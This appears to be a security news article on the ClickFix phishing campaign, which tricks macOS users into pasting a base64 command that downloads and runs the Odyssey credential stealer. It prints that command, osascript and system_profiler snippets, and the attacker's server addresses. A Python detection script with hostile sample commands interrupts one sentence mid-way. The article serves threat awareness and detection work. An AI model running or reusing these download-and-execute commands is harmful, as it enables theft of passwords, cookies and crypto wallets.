ClickFix Malware Attacks macOS Users to Steal Login Credentials

Posted on August 11, 2025 By CWS

In recent months, security researchers have observed a novel phishing campaign targeting macOS users under the guise of a CAPTCHA verification process.

The attack, dubbed "ClickFix," combines social engineering with operating system detection to coax victims into executing malicious commands directly in their terminals.

By mimicking legitimate Cloudflare-style checks, the malware avoids dropping conventional binaries, relying instead on base64-encoded scripts that fetch and run an obfuscated AppleScript payload.

Initially, unsuspecting users navigating to a compromised URL, often one impersonating a popular trading platform, are presented with a human verification page tailored to their operating system.

Windows visitors receive innocuous PowerShell instructions, whereas macOS users are instructed to open Terminal, paste a copied command, and press Return.

macOS instructions (Source – Forcepoint)

Forcepoint analysts identified that this subtle divergence in instructions is designed to trick macOS victims into executing a command that decodes a base64 string and pipes it into bash:

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY=" | base64 -d | bash

Once the command runs, it installs an obfuscated compiled AppleScript file (.scpt) that carries out the core data harvesting. The script begins by creating a unique temporary directory under /tmp, using osascript calls to assemble and execute commands:

osascript -e 'run script "on mkdir(item)\ntry\nset filePath to quoted form of (POSIX path of item)\ndo shell script \"mkdir -p \" & filePath\nend try\nend mkdir"'

Forcepoint researchers noted that, after directory setup, the malware scans the user's Desktop, Documents, and Library folders for files with extensions such as .pdf, .docx and .key, and for browser-specific artifacts including Keychain databases, Safari cookies, and Apple Notes databases.

Beginning of script and creation of the directory (Source – Forcepoint)

The script proceeds to enumerate profiles in Firefox and Chromium-based browsers, copying saved credentials, cookies, form history, and encrypted wallet files for known crypto extensions such as MetaMask and Exodus.

Infection Mechanism Deep Dive

The infection mechanism hinges on the manual execution of a seemingly benign "verification" command. By using base64 encoding, the attackers obscure the payload's true purpose, bypassing signature-based detection.

When decoded, the payload fetches a heavily obfuscated AppleScript from a remote server (hxxp://45.146.130[.]131/d/vipx14350). This AppleScript employs random string obfuscation and nested osascript invocations to hinder static analysis.

Upon execution, it prompts the user for their password to escalate privileges and then collects system profile details via:
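As an added example, not part of the Forcepoint write-up or this article, the following Python triages captured process command lines for the pattern described above: a base64 string echoed into base64 -d and piped to a shell, with the decoded stage inspected for downloader indicators. The sample command lines, and the TEST-NET address in the constructed payload, are made up for this example.

```python
import base64
import binascii
import re

# Process command lines of the kind an EDR or macOS unified-log pipeline records.
# Constructed for this example; the encoded stage points at a TEST-NET address, not a real server.
CONSTRUCTED_STAGE1 = b"curl -s http://203.0.113.5/d/stage1 | nohup bash &"
SAMPLE_COMMANDS = [
    'echo "%s" | base64 -d | bash' % base64.b64encode(CONSTRUCTED_STAGE1).decode(),
    'echo "aGVsbG8gd29ybGQ=" | base64 -d',   # decodes to "hello world", never reaches a shell
    "osascript -e 'display dialog \"hi\"'",  # ordinary AppleScript use, no encoding
]

# A base64 decode piped straight into an interpreter is the ClickFix tell.
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:bash|sh|zsh|osascript)\b")
# The echo'd string the user was told to paste: a long base64 token, optionally quoted.
ECHO_B64 = re.compile(r"echo\s+[\"']?([A-Za-z0-9+/]{8,}={0,2})[\"']?")
# Second-stage indicators that commonly appear once the string is decoded.
PAYLOAD_HINTS = ("curl ", "wget ", "nohup ", "osascript", "http://", "https://", "| bash", "| sh")

def decode_echo_payload(cmdline):
    """Return the decoded echo'd base64 text, or None if absent or not valid base64."""
    m = ECHO_B64.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def analyze_command(cmdline):
    """Inspect one command line; returns the decoded payload and the reasons it was flagged."""
    reasons = []
    if DECODE_TO_SHELL.search(cmdline):
        reasons.append("base64 decode piped to a shell interpreter")
    decoded = decode_echo_payload(cmdline)
    if decoded:
        hits = [h.strip() for h in PAYLOAD_HINTS if h in decoded]
        if hits:
            reasons.append("decoded payload contains: " + ", ".join(hits))
    return {"command": cmdline, "decoded": decoded, "reasons": reasons, "suspicious": bool(reasons)}

def triage(commands):
    """Return only the findings that were flagged, for a batch of command lines."""
    return [r for r in map(analyze_command, commands) if r["suspicious"]]

if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMANDS):
        print(finding["reasons"], "<-", finding["decoded"])
```

Decoding the echoed string at detection time lets the analyst match on what the victim actually executed rather than on an ever-changing base64 blob.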

system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType

The harvested data, together with the gathered files, is archived into /tmp/out.zip and exfiltrated to the attacker's C2 endpoint at 45.146.130.131/log.

A cleanup routine then removes the temporary directory to erase traces, complicating forensic recovery.

Odyssey stealer login page (Source – Forcepoint)

By combining familiar CAPTCHA prompts with terminal-based social engineering, the Odyssey stealer delivered through ClickFix demonstrates a sophisticated evasion technique that sidesteps traditional antivirus solutions, emphasizing the need for heightened user awareness and multi-layered endpoint controls.
